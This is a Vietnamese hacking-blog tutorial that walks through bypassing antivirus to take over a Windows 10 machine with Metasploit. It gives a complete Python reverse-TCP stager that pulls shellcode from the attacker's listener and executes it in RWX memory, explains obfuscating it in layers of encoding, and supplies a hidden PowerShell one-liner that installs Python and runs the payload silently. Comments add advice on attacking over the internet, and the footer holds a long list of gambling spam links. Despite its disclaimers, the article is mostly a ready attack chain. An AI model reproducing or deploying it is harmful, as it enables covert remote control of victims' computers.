• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Mình đã Bypass AV xâm nhập Windows 10 với Metasploit và Python như thế nào ?

Hevin by Hevin
09/06/2023 - Updated on 24/07/2025
in Basic Hacking
A A
6

Mục lục bài viết

  1. Khái niệm sơ qua về Metasploit
  2. Meterpreter Reverse TCP trong Metasploit là gì ?
  3. Tạo payload Meterpreter Reverse TCP trong Metasploit với Python
  4. Tấn công Windows 10 với Metasploit và Python
  5. Câu hỏi thường gặp
    1. Payload windows/meterpreter/reverse_tcp là gì và tại sao lại sử dụng nó?
    2. Việc sử dụng Metasploit và Python trong bài viết có an toàn không?
    3. Có cách nào khác để kiểm tra tính bảo mật hệ thống ngoài phương pháp này không?

An ninh mạng đóng vai trò quan trọng trong thế giới công nghệ ngày nay. Việc kiểm tra và nâng cao độ bảo mật hệ thống là trách nhiệm của người quản trị hệ thống và chuyên gia an ninh. Tuy nhiên, việc vượt qua phần mềm chống virus ( Bypass AntiVirus ) đã trở thành một phần không thể thiếu trong quá trình kiểm tra và đánh giá an ninh. Trong bài viết này, mình sẽ chia sẻ với bạn về kinh nghiệm thành công của mình trong việc Bypass AV và xâm nhập vào một máy tính chạy hệ điều hành Windows 10 bằng cách sử dụng Metasploit và Python. Đây là một quá trình thử thách và mang lại sự hiểu biết sâu hơn về phần mềm chống vi-rút và phát hiện các lỗ hổng trong hệ thống. Sau vài ngày mình tìm tòi về payload windows/meterpreter/reverse_tcp của Metasploit. mình đã viết ra 1 đoạn Script Python nhỏ cho payload này và cuối cùng thực hiện việc xâm nhập vào máy tính mục tiêu với đoạn script đó. Hãy cùng mình khám phá và tìm hiểu quá trình bypass AV và xâm nhập vào Windows 10 bằng cách sử dụng Metasploit và Python trong bài viết này nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Lưu ý: Bài viết không khuyến khích việc sử dụng kỹ thuật này cho bất kỳ hoạt động bất hợp pháp hoặc gây hại cho người khác. Anonyviet hy vọng rằng thông qua việc chia sẻ kiến thức này, bạn có thể nâng cao hiểu biết về an ninh mạng và áp dụng các biện pháp bảo vệ để bảo vệ hệ thống của mình. Mọi hành vi bất hợp pháp Anonyviet sẽ không chịu mọi trách nhiệm !

Các bài viết liên quan

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell 3

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

20/07/2025 - Updated on 25/07/2025
Cách Hacker Bypass AV xâm nhập Windows với Autoit

Cách Hacker Bypass AV xâm nhập Windows với Autoit

09/01/2024 - Updated on 24/07/2025
6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus 4

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023 - Updated on 24/07/2025
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023 - Updated on 24/07/2025

Khái niệm sơ qua về Metasploit

Metasploit là một framework mã nguồn mở rất phổ biến trong lĩnh vực kiểm thử xâm nhập và khai thác lỗ hổng. Nó được sử dụng để tạo ra một môi trường điều kiện nhân tạo để phân tích các lỗ hổng bảo mật, giúp các chuyên gia bảo mật tìm ra các điểm yếu trong hệ thống mạng và ứng dụng của họ. Metasploit cung cấp rất nhiều công cụ và tài nguyên để tấn công và khai thác các lỗ hổng trong hệ thống, giúp chuyên gia bảo mật kiểm tra và tăng cường tính bảo mật của mạng và ứng dụng. Metasploit được phát triển bởi Rapid7 và sử dụng ngôn ngữ lập trình Ruby, với giao diện dòng lệnh và đồ họa để người dùng dễ dàng sử dụng. Nó cho phép người dùng tự động hóa quá trình kiểm thử và tìm ra các lỗ hổng, tăng cường hiệu suất và tiết kiệm thời gian. Metasploit cung cấp nhiều tính năng như scan port, tìm kiếm lỗ hổng, khai thác, tràn bộ đệm, thu thập thông tin, tạo mã độc,…. Nó cũng cung cấp một cơ sở dữ liệu lỗ hổng rộng lớn, cho phép người dùng tìm kiếm và khai thác các lỗ hổng đã được biết đến. Không những thế nó còn là một công cụ được sử dụng để kiểm tra và củng cố tính bảo mật của hệ thống từ đó cung cấp một môi trường an toàn hơn cho các hệ thống mạng và ứng dụng

Meterpreter Reverse TCP trong Metasploit là gì ?

Meterpreter Reverse TCP là một loại kết nối ngược (reverse connection) được sử dụng trong Metasploit Framework để tạo một secure channel ( kênh truyền thông an toàn ) giữa máy tấn công và máy mục tiêu.

Khi sử dụng Meterpreter Reverse TCP, máy hacker đóng vai trò là máy chủ lắng nghe (listener), trong khi máy nạn nhân là máy khách (client). Quá trình hoạt động diễn ra như sau:

  1. Máy hacker khởi động một cổng TCP cụ thể ( listener )
  2. Máy nạn nhân lây nhiễm bởi một payload (chương trình độc hại) thông qua một phương thức tấn công, ví dụ như download phần mềm độc hại,  hoặc xâm nhập qua email,…
  3. Payload được thiết lập trên máy mục tiêu và kết nối ngược (reverse connection) được thiết lập từ máy nạn nhân đến máy hacker thông qua giao thức TCP.
  4. Khi kết nối được thiết lập, Meterpreter là một công cụ quản lý tấn công mạnh mẽ trong Metasploit, được chạy trên máy nạn nhân và giao tiếp với máy hacker thông qua secure channel đã thiết lập
Xem thêm:  Code phá hủy MBR ổ cứng - Tấn công và phòng chống

Meterpreter Reverse TCP cung cấp nhiều tính năng mạnh mẽ cho hacker, bao gồm khả năng kiểm soát từ xa máy nạn nhân, thực thi các lệnh trên hệ thống của nạn nhân, truy cập vào các tệp và thư mục, thu thập thông tin quan trọng và thậm chí thâm nhập sâu vào hệ thống

Tạo payload Meterpreter Reverse TCP trong Metasploit với Python

Chi tiết cấu trúc payload:

  • Kết nối đến máy hacker thông qua socket TCP/IP.
  • Nhận dữ liệu từ kết nối và giải nén các thông tin cần thiết.
  • Sử dụng thư viện ctypes trong Python để cấp phát bộ nhớ và sao chép mã máy thấp vào bộ nhớ.
  • Tạo một luồng riêng biệt để thực thi mã máy thấp trong bộ nhớ.
  • Dừng chương trình chính để duy trì quyền điều khiển từ xa

Đoạn code Python này bắt đầu bằng việc import các thư viện cần thiết để làm việc với socket, struct, time, threading và ctypes

import socket
import struct
import time
import threading
import ctypes

 

Biến ip định nghĩa địa chỉ IP mà máy tính đang chạy chương trình sẽ kết nối đến. Biến port chỉ định số cổng để kết nối tới hacker

ip = "<ip>" # địa chỉ ip hacker
port = <port> # số cổng hacker đã mở bên Metasploit

 

Khởi tạo biến connected để theo dõi trạng thái kết nối và sử dụng vòng lặp while để thử kết nối với máy hacker cho đến khi thành công. Trong vòng lặp while này, một socket được tạo và cố gắng kết nối đến địa chỉ IP và cổng của hacker. Nếu kết nối thành công, biến connected được đặt thành True và vòng lặp dừng lại. Nếu xảy ra lỗi TimeoutError, payload sẽ chờ 0.1 giây rồi kết nối lại

connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

 

Nhận dữ liệu đầu tiên từ socket. Dòng code bên dưới sử dụng phương thức recv() của socket để nhận 4 byte dữ liệu đầu tiên từ kết nối

data = s.recv(4)

 

Giải nén độ dài dữ liệu từ dữ liệu nhận được. Dòng code bên dưới sử dụng hàm unpack() từ module struct để giải nén 4 byte đầu tiên của dữ liệu thành một số nguyên không dấu 32 bit (unsigned integer) được đóng gói theo định dạng little-endian. Sau đó, giá trị này được cộng với 5 và gán cho biến data_len. Việc cộng 5 đến data_len là do dữ liệu sau khi giải nén bao gồm cả 4 byte đầu tiên nhưng cần phải chứa thêm 5 byte

data_len = struct.unpack("<I", data)[0] + 5

 

Tiếp tục nhận dữ liệu từ socket cho đến khi đủ độ dài đã giải nén. Vòng lặp này sử dụng phương thức recv() để nhận dữ liệu từ socket cho đến khi tổng chiều dài của dữ liệu đã nhận được bằng với data_len

while len(data) < data_len:
    data += s.recv(data_len - len(data))

 

Đóng gói handle của socket và dữ liệu đã nhận vào một bytearray mới. Với dòng code này sử dụng hàm pack() từ module struct để đóng gói số hiệu file (file descriptor) của socket (s.fileno()) thành một bytearray handle. Sau đó, các bytearray khác được tạo ra bằng cách ghép nối bytearray [0xBF]một bytearray chứa một phần tử duy nhất là giá trị 0xBF (191 trong hệ thập phân), bytearray(handle) chuyển đổi biến handle từ kiểu dữ liệu được đóng gói thành một bytearray mới.data[4:] truy cập vào phần dữ liệu đã nhận từ socket, bắt đầu từ byte thứ 4 (bỏ qua 4 byte đầu tiên). Toàn bộ các bytearray được ghép nối với nhau bằng phép cộng (+) để tạo ra bytearray data mới

handle = struct.pack("<I", s.fileno())
data = bytearray([0xBF]) + bytearray(handle) + data[4:]

 

Hai hằng số MEM_COMMIT và PAGE_EXECUTE_READWRITE được định nghĩa để sử dụng trong việc cấp phát bộ nhớ và thiết lập quyền truy cập bộ nhớ. MEM_COMMIT là một hằng số được đặt giá trị là 0x1000, biểu thị chế độ cấp phát bộ nhớ trong hàm VirtualAlloc().Giá trị 0x1000 tương ứng với cấp phát vùng nhớ mới và cấu hình quyền truy cập vào vùng nhớ đó. PAGE_EXECUTE_READWRITE là một hằng số có giá trị là 0x40, biểu thị quyền truy cập vào vùng nhớ trong hàm VirtualAlloc(). Giá trị 0x40 đại diện cho quyền truy cập đọc, ghi và thực thi (execute) cho vùng nhớ đó. Bằng cách sử dụng PAGE_EXECUTE_READWRITE, mình cho phép vùng nhớ được cấp phát có thể chứa mã thực thi và có thể đọc và ghi dữ liệu

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

 

Xem thêm:  Orcus RAT - Hậu Duệ Của NanoCore xâm nhập máy tính

Sử dụng thư viện kernel32 từ ctypes để cấp phát và sao chép dữ liệu vào bộ nhớ. Dòng code bên dưới sử dụng hàm VirtualAlloc() của thư viện kernel32 để cấp phát một khối bộ nhớ có kích thước là len(data). Khối bộ nhớ này sẽ được cấp phát với quyền truy cập PAGE_EXECUTE_READWRITE. Sau đó, dữ liệu từ data được sao chép vào địa chỉ bộ nhớ được cấp phát bằng cách sử dụng ctypes.memmove(). Các dòng code mà mình đã đề cập có liên quan đến việc sử dụng Windows API thông qua ctypes để cấp phát và sao chép dữ liệu vào vùng nhớ được cấp phát. Cụ thể như sau:

  1. kernel32 = ctypes.windll.kernel32:
    • Dòng này tạo một đối tượng kernel32 để truy cập các hàm của Windows API trong thư viện kernel32.dll.
    • ctypes.windll là một cách để truy cập các thư viện được cung cấp bởi hệ điều hành Windows.
  2. address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    • kernel32.VirtualAlloc() là một hàm trong Windows API để cấp phát vùng nhớ ảo.
    • Dòng mã trên gọi hàm VirtualAlloc() để cấp phát một vùng nhớ ảo mới.
    • None đại diện cho địa chỉ cơ sở (base address) của vùng nhớ ảo (do không xác định trước).
    • len(data) xác định kích thước (số byte) của vùng nhớ cần cấp phát, dựa trên kích thước của data.
    • MEM_COMMIT là hằng số đã được định nghĩa trước, biểu thị chế độ cấp phát bộ nhớ.
    • PAGE_EXECUTE_READWRITE cũng là hằng số đã được định nghĩa trước, biểu thị quyền truy cập vào vùng nhớ.
  3. data_array = (ctypes.c_char * len(data)).from_buffer(data):
    • Dòng mã này tạo một mảng data_array với kiểu dữ liệu ctypes.c_char và kích thước là len(data).
    • ctypes.c_char đại diện cho một ký tự (byte) trong ctypes.
    • .from_buffer(data) tạo một view (chế độ xem) của mảng data đã được nhận trước đó, nghĩa là mảng data_array sẽ trỏ đến vùng nhớ của data để sử dụng chung dữ liệu.
  4. ctypes.memmove(address, ctypes.pointer(data_array), len(data)):
    • ctypes.memmove() là một hàm trong ctypes để sao chép dữ liệu từ một vùng nhớ đến một vùng nhớ khác.
    • Dòng mã trên sao chép nội dung của data_array vào vùng nhớ được cấp phát address.
    • address là địa chỉ cần sao chép dữ liệu đến.
    • ctypes.pointer(data_array) trả về con trỏ đến vùng nhớ của data_array.
    • len(data) xác định số byte cần sao chép

Nói chung là đoạn code bên dưới sử dụng Windows API thông qua ctypes để cấp phát một vùng nhớ ảo mới, tạo một mảng dữ liệu data_array trỏ đến dữ liệu đã nhận từ socket, và sau đó sao chép dữ liệu từ data_array vào vùng nhớ đã được cấp phát. Quá trình này chuẩn bị cho việc thực thi mã thực thi từ vùng nhớ ảo đó

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))

 

Với dòng code bên dưới, mình đã tạo một luồng mới bằng cách sử dụng module threading.Thread(). Luồng này sẽ thực thi mã máy thấp tại địa chỉ bộ nhớ được cấp phát. Địa chỉ bộ nhớ này được truyền vào target dưới dạng con trỏ hàm ctypes.CFUNCTYPE(None). Không có đối số được truyền vào luồng (args=())

thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

 

Dòng code cuối cùng dùng để cho payload chạy trong 9999999 giây tức là khoảng 115 ngày, bạn có thể tăng thêm hoặc giảm thời gian tùy ý nhé

time.sleep(9999999)

 

Đây là toàn bộ mã nguồn mà mình đã tạo:

import socket
import struct
import time
import threading
import ctypes

ip = "<ip>" # địa chỉ ip hacker 
port = <port> # số cổng hacker đã mở bên Metasploit
connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

data = s.recv(4)

data_len = struct.unpack("<I", data)[0] + 5
while len(data) < data_len:
    data += s.recv(data_len - len(data))

handle = struct.pack("<I", s.fileno())

data = bytearray([0xBF]) + bytearray(handle) + data[4:]

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))


thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

time.sleep(9999999)

Bây giờ chúng ta sẽ đến phần tấn công Windows 10 với Metasploit và Python nhé

Xem thêm:  WishFish - Công cụ Chụp ảnh Webcam và Camera điện thoại của người khác

Tấn công Windows 10 với Metasploit và Python

Bây giờ, máy hacker có địa chỉ ip 192.168.1.3 và port tcp 9999, tiếp đến địa chỉ ip máy nạn nhân là 192.168.1.5, mình sẽ tiến hành setup trên Metasploit như sau:

Bypass AV hack WIndows 10 với Metasploit và Python

 

Được rồi, giờ mình mã hóa script python với module marshal, zlib, lzma và base64 để tránh các phần mềm AntiVirus quét được, đoạn script python đã mã hóa có dạng như sau:

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Sau khi mã hóa script python với module marshal, zlib, lzma và base64, mình lại mã hóa toàn bộ script với base64 tại website base64encode.org

Bấm vào “ENCODE” để bắt đầu mã hóa

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Bấm vào “Copy to clipboard” để copy mã base64 lại nhé

bypass AV xâm nhập Windows 10 với Metasploit và Python

Đây là đoạn lệnh Powershell mình đã viết sẵn, việc của bạn là chỉ cần paste toàn bộ script được mã hóa bằng base64. Bạn thay thế <your base64code payload>thành mã base64 của bạn

powershell.exe -WindowStyle Hidden -Command "$code_payload='<your base64code payload>'; $bat1='@echo off'; $bat2='pythonRun module.py'; $cd_appdata=$Env:AppData; Set-Location -Path $cd_appdata; $current_cwd=Get-Location; if (Test-Path -Path 'pythonRun') { Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden } else { Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.9/python-3.10.9-embed-win32.zip' -OutFile pythonRun.zip; Expand-Archive -Path pythonRun.zip -DestinationPath pythonRun; Start-Sleep -Seconds 1; Rename-Item -Path \"$current_cwd\pythonRun\python.exe\" -NewName pythonRun.exe; Remove-Item -Path pythonRun.zip; Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden }"

 

Đây là đoạn lệnh của mình, chỉ cần thực thi đoạn lệnh Powershell là nó tự động tải Python vào máy nạn nhân và thực thi đoạn script Python độc hại đã được mã hóa bằng base64

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Và đây là kết quả

Như vậy, chưa đầy 50 dòng code Python cộng với 1 đoạn lệnh Powershell và công cụ Metasploit, mình đã có thể xâm nhập Windows 10 rồi. Mình muốn nhấn mạnh rằng việc tấn công máy tính của người khác là trái với đạo đức và pháp luật. Mình viết bài này chỉ để giúp người đọc hiểu thêm về cách thức hoạt động của các mã độc và cách phòng chống nó. Nếu bạn là một chuyên gia bảo mật, mình hy vọng rằng bài viết này sẽ giúp bạn nâng cao kiến thức và kỹ năng của mình trong việc sử dụng công cụ Metasploit để kiểm tra tính an toàn của hệ thống và bảo vệ chúng khỏi các cuộc tấn công từ phía tin tặc. Và nếu bạn là một người dùng bình thường, mình khuyên bạn luôn cập nhật các phần mềm bảo mật và hạn chế việc tải các phần mềm từ những nguồn không rõ nguồn gốc để bảo vệ tốt nhất cho hệ thống của mình.

Cuối cùng, mình muốn nhấn mạnh rằng việc sử dụng các công cụ Metasploit cũng như là các công cụ khác để xâm nhập vào hệ thống của người khác là trái với đạo đức và pháp luật. Chúng ta cần tôn trọng quyền riêng tư và bảo vệ an toàn thông tin của nhau nhé. Chúc bạn có một ngày tốt lành ! BYE BYE !!!!

 

Bạn cũng có thể đọc thêm bài viết Cách quét lỗ hổng bằng Metasploit 

Câu hỏi thường gặp

Payload windows/meterpreter/reverse_tcp là gì và tại sao lại sử dụng nó?

Payload windows/meterpreter/reverse_tcp là một loại payload Metasploit tạo ra một kết nối ngược từ máy tính mục tiêu về máy của người tấn công. Nó được sử dụng vì khả năng cung cấp một shell tương tác, cho phép người tấn công điều khiển máy tính mục tiêu từ xa.

Việc sử dụng Metasploit và Python trong bài viết có an toàn không?

Bài viết chỉ trình bày mục đích giáo dục về an ninh mạng. Việc sử dụng Metasploit và các kỹ thuật tương tự mà không được phép là bất hợp pháp. Chỉ sử dụng các kỹ thuật này trên hệ thống của bạn hoặc hệ thống mà bạn có quyền truy cập hợp pháp.

Có cách nào khác để kiểm tra tính bảo mật hệ thống ngoài phương pháp này không?

Có rất nhiều phương pháp khác để đánh giá an ninh mạng, bao gồm quét lỗ hổng, kiểm thử thâm nhập (penetration testing) chuyên nghiệp, phân tích mã độc và triển khai các hệ thống giám sát bảo mật.

Tags: avBypass avvirus
Hevin

Hevin

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 5
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 6
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 7
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 8
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 9
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 10
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

6 Comments
oldest
newest
Inline Feedbacks
View all comments
huy hoang
huy hoang
2 years ago

Mình vẫn chưa hiểu nếu cách này thì chỉ dùng cho cùng mạng LAn đúng không chứ từ xa qua ip tĩnh và port thì máy nạn nhân nó đầu tấn công được

Reply
AnonyViet
Admin
AnonyViet
2 years ago
Reply to  huy hoang

tấn công từ xa thì bạn nat port

Reply
long
long
7 months ago
Reply to  AnonyViet

có cách nào không cần nat port không bác, forward port đc ko bác

Reply
AnonyViet
Admin
AnonyViet
7 months ago
Reply to  long

bạn xem các hướng dẫn ở đây https://anonyviet.com/?s=nat+port

Reply
Trung
Trung
1 year ago

cho mình hỏi nếu chx thêm your base64code payload vào máy thì chạy không sao đúng không? Mình lỡ chạy nhma chưa thêm cái your base64code payload của mình vào

Reply
hevin
hevin
11 months ago
Reply to  Trung

Đúng rồi bạn, chưa thêm base64 code máy chạy không sao đâu

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Hướng dẫn cài Scarlet iOS để cài mọi file IPA không bị thu hồi 11

Hướng dẫn cài Scarlet iOS để cài mọi file IPA không bị thu hồi

by Thanh Kim
22/10/2025
0

[CẬP NHẬT] 150+ Tên kí tự đặc biệt HOT TREND mới nhất 2026 12

[CẬP NHẬT] 150+ Tên kí tự đặc biệt HOT TREND mới nhất 2026

by AnonyViet
21/10/2025
0

Làm hình nền động cho iPhone bằng Nugget & Pocket Poster 13

Làm hình nền động cho iPhone bằng Nugget & Pocket Poster

by Thanh Kim
21/10/2025
0

Nhận 25.000 điểm Viettel miễn phí cực dễ dàng nhân dịp sinh nhật 25 năm 14

Nhận 25.000 điểm Viettel miễn phí cực dễ dàng nhân dịp sinh nhật 25 năm

by Thanh Kim
20/10/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • Việt trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • HAI trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • thịnh trong Hướng dẫn nhận key IObit Uninstaller 14 miễn phí 6 tháng
  • veoe trong Bí quyết tạo ảnh cầm bó hoa đẹp như bìa tạp chí với Nano Banana
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • mon trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Felizz23 trong Namecheap khuyến mãi 3 Domain giá 0$
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • ann trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Kim trong Namecheap khuyến mãi 3 Domain giá 0$
  • em hậu trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • Võ Sĩ Cua trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Tuấn Tú trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Quốc Vũ trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Ski trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • linh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Heheehe🐧 trong Top 10 Phần mềm miễn phí cho Windows 11 nên cài
  • Jdi trong Download Hack of Products v5 APK – Hack vật phẩm trên Android
  • Hoàng Na trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • nam trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay trực tiếp bóng đá xoilac xoilac 8x bet https://cwfun.org/ 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 xn88 kubet RR88 cakhiatv f8bet https://qq883a.com/ XX88 mu88 casino https://sunwin10.org/ f168 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 vip66 xoso66 https://tp88fun.com/ daga hello88 qq88 GK88 PG88 SV388 PG88 Xoso66 Vip66 hitclub bong99 Ga6789 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 Thabet press ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ sv368pro https://xx88.space/ xoilac cakhiatv socolive QQ88 TP88 Xoso66 xoso66 u888 79king pg88 f168 88vv https://mm88.today/ mu88 com 8kbet https://qq88pro.vip/ xoso66 98win fun88.supply king88 33win sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ EE88 FB88 TYPHU88 https://xx88.ink/ https://da88.design/ 789f Kkwin go88 79king xin88 XX88 VSBET 23WIN https://mb66co.com/ https://fun88.supply/ pg88 thapcamtv thapcamtv https://rr88.navy/ https://e2beting.com/ gem88 bk8 bk8 F8BET80 typhu88 k8cc sa88 https://q23win.com/ 32win 32win 78win 68win BET88 luongsontv luongsontv https://vankhanhtv.cc/ 9bet https://nohutm.com SODO fun88 sunwin BL555 u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 https://go991.club/ 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ Jun88.estate OK9 SHBET https://xx88.center/ vswin HM88 NỔ HỦ ĐỔI THƯỞNG 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 F168 https://k8cc.wiki/ https://betvisa.wales/ https://12betp1.com/ https://loto188.im/ https://celinediontv.com/ https://sun-n-fun.com/ RR88 RR88 https://qq88.studio/ ee88 https://kjc88.com.de/ tài xỉu online uy tín Game bài đổi thưởng uy tín kèo nhà cái kèo nhà cái 5 789f 188bet w88 Gem88 Thabet jun88 kclub vip79 dv88 Gi8 For88 Rikbet 8kbet 6ff AX88 Kkwin HZ88 tv88 ABC8 https://ww88.me/ https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ sodo casino https://xx88.ac/ C54 xx88.me.uk gem88 king88 ae888 bj88 good88 32WIN https://xx88.today/ hm88 XX88 GO8 NH88 https://ok99.co.com/ XN88 58WIN NH88 32WIN ST666 28BET xn88 https://pg666.baby/ 789f 789f 88xx 98win mv88 https://469vns.com/ 888NEW TV88 XN88 NN88 MV88 MV66 GO8 XN88 NOHU90 TV88 68WIN 89BET 888NEW GO99 AF88 HM88 HZ88 https://xx88.asia/ TK88 789f u888lm.com NOHU HITCLUB Sunwin 58WIN 9BET DA88 MV88 tv88 888NEW AZ888 89bet https://rr88.pizza/ win55 888NEW GO8 888new 888new XN88 https://urr88.com/ 789win PG99 13win Thabet Casino 8kbet WW88 https://qq88.agency/ 88i nn88 99win f8bet https://1mm88.info/ 69vn https://hhpanda.to/ https://u888wl.com/ Nohu90 Go8 mv66 win678 https://kjc.vegas/ https://qq88gg.net/ https://789f.capital/ 58winm.net ww888.gifts mv66 https://ae888hn.com/ https://ok365se.com/ pu88 KKWIN kèo nhà cái https://hubet.horse/ https://88vv5.biz/ 8kbet win678 https://f168.limo/ 58win 789F go99 https://okfun.lat/ 